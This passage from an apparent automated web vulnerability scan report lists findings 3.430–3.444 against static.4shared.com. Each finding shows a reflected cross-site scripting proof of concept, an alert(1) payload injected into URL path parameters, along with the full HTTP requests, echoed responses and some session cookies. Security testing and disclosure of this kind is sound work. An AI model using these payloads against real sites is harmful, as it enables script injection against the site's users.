function feedback() {

...[SNIP]...

3.430. http://static.4shared.com/images/ipic.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/ipic.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b4f"-alert(1)-"94dac4f1560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ipic.jpg20b4f"-alert(1)-"94dac4f1560 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/ipic.jpg20b4f&quot;-alert(1)-&quot;94dac4f1560
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5BAF51C7A76C26D994BA2C87560631AE.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:55 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/ipic.jpg20b4f"-alert(1)-"94dac4f1560";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.431. http://static.4shared.com/js/dw_drag.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_drag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79778"-alert(1)-"1c264739c21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js79778"-alert(1)-"1c264739c21/dw_drag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js79778&quot;-alert(1)-&quot;1c264739c21/dw_drag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA91D5B32A64AEF6FE6CA52D10425C19.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:23 GMT
Content-Length: 36149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js79778"-alert(1)-"1c264739c21/dw_drag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.432. http://static.4shared.com/js/dw_drag.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87f"-alert(1)-"6f121a1eda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_drag.jsbf87f&quot;-alert(1)-&quot;6f121a1eda2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF6758CFC672FC39672A2E95C372AAFE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:27 GMT
Content-Length: 36160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.433. http://static.4shared.com/js/dw_event.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_event.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a920"-alert(1)-"365bd27b3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7a920"-alert(1)-"365bd27b3c3/dw_event.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js7a920&quot;-alert(1)-&quot;365bd27b3c3/dw_event.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=14ADD58AABB5318B45D845F998D1168A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js7a920"-alert(1)-"365bd27b3c3/dw_event.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.434. http://static.4shared.com/js/dw_event.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_event.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27f2c"-alert(1)-"68c4ab76dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_event.js27f2c&quot;-alert(1)-&quot;68c4ab76dbc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA0777C4018C733CAB00C1514B66D2C7.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.435. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_viewport.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a31"-alert(1)-"63ff542d0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsb9a31&quot;-alert(1)-&quot;63ff542d0f7/dw_viewport.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A9A71F3EE25BF897A04780FEF001C40.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36169


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

3.436. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_viewport.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc2d"-alert(1)-"2c2ee3eca79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_viewport.jsccc2d&quot;-alert(1)-&quot;2c2ee3eca79
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DFCAF3D03EAF65592088FA7DE98267CF.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:21 GMT
Content-Length: 36169


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.437. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_writedrag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c70"-alert(1)-"b6cb32f2907 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js77c70&quot;-alert(1)-&quot;b6cb32f2907/dw_writedrag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B42FB6A3B5C40554B67136CE43B3F3A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.438. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_writedrag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfe"-alert(1)-"82ae5dcc5d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_writedrag.jsd0dfe&quot;-alert(1)-&quot;82ae5dcc5d6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FDAEE0E2122E00D757F4E27374A656D.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.439. http://static.4shared.com/js/index.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9c5"-alert(1)-"97dd4e6f4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscb9c5"-alert(1)-"97dd4e6f4ff/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jscb9c5&quot;-alert(1)-&quot;97dd4e6f4ff/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44D71914FF632BBB045AD7386A660F6A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jscb9c5"-alert(1)-"97dd4e6f4ff/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.440. http://static.4shared.com/js/index.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93e21"-alert(1)-"78ca177c741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.js93e21"-alert(1)-"78ca177c741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/index.js93e21&quot;-alert(1)-&quot;78ca177c741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0BDD0F053EB06C78C9916D42FCFFE7AC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:56 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/index.js93e21"-alert(1)-"78ca177c741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.441. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e7d"-alert(1)-"6b8c1a3bc02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js41e7d&quot;-alert(1)-&quot;6b8c1a3bc02/jquery-1.4.4.min.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=27959477059AB3FDE308F3E82A184D47.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

3.442. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2749"-alert(1)-"ee01858fec6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/jquery-1.4.4.min.jsa2749&quot;-alert(1)-&quot;ee01858fec6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=645AD265F2FDE7DEF72BC64223084E6E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:57 GMT
Content-Length: 36194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.443. http://static.4shared.com/js/login_fnc.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/login_fnc.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd0d"-alert(1)-"c510e79c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /jsdcd0d&quot;-alert(1)-&quot;c510e79c899/login_fnc.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B8B1596CCAE89B1C7DAED6AB2D79C1E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.444. http://static.4shared.com/js/login_fnc.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/login_fnc.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbfde"-alert(1)-"8729de527e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
